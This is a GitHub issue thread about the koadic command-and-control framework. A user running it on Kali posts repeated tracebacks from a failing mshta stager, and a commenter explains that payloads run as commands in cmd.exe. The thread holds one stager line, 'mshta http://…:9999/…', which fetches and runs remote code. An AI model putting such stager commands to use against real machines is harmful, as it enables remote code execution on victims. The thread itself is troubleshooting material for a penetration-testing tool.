### ISSUE TITLE
Issue when user connects to stager

### ISSUE THREAD

**Issue by brandontict** [zerosum0x0/koadic#143]
Server Machine
OS: kali 2020 
Kernel: 5.9.0
Client Machine: 
Windows 10  
Browser: Tried against firefox, chrome and edge . 

Stager being used **mshta stager** with default options. 

After I direct the client machine to the stager, The webpage stays white. ( I've also tried other stagers, with same issue )

On the server end,  koadic receives an error , 

`[>] mshta http://192.168.0.92:9999/nTQa2
(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61550)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61547)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61548)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61552)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61555)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61557)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61556)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61572)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61599)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.0.9', 61732)
Traceback (most recent call last):
  File "/usr/lib/python3.8/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.8/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.8/socketserver.py", line 720, in __init__
    self.handle()
  File "/pentest/c2/koadic/core/handler.py", line 86, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.8/http/server.py", line 427, in handle
    self.handle_one_request()
  File "/usr/lib/python3.8/http/server.py", line 415, in handle_one_request
    method()
  File "/pentest/c2/koadic/core/handler.py", line 194, in do_GET
    return self.handle_oneshot()
  File "/pentest/c2/koadic/core/handler.py", line 261, in handle_oneshot
    j = plugin.job(self.shell, -1, plugin.STATE, workload, options)
AttributeError: 'MSHTAStager' object has no attribute 'STATE'
----------------------------------------
`
I'm running koadic as SU . Followed Readme for installation . 

Any ideas? 
Thanks for sharing your project.

**Comment by TheNaterz** [comment]
Koadic payloads are not launched through a browser. Koadic payloads are executed as commands. You can either paste the entire payload into cmd.exe or you can paste the payload into some other tool that runs commands remotely.
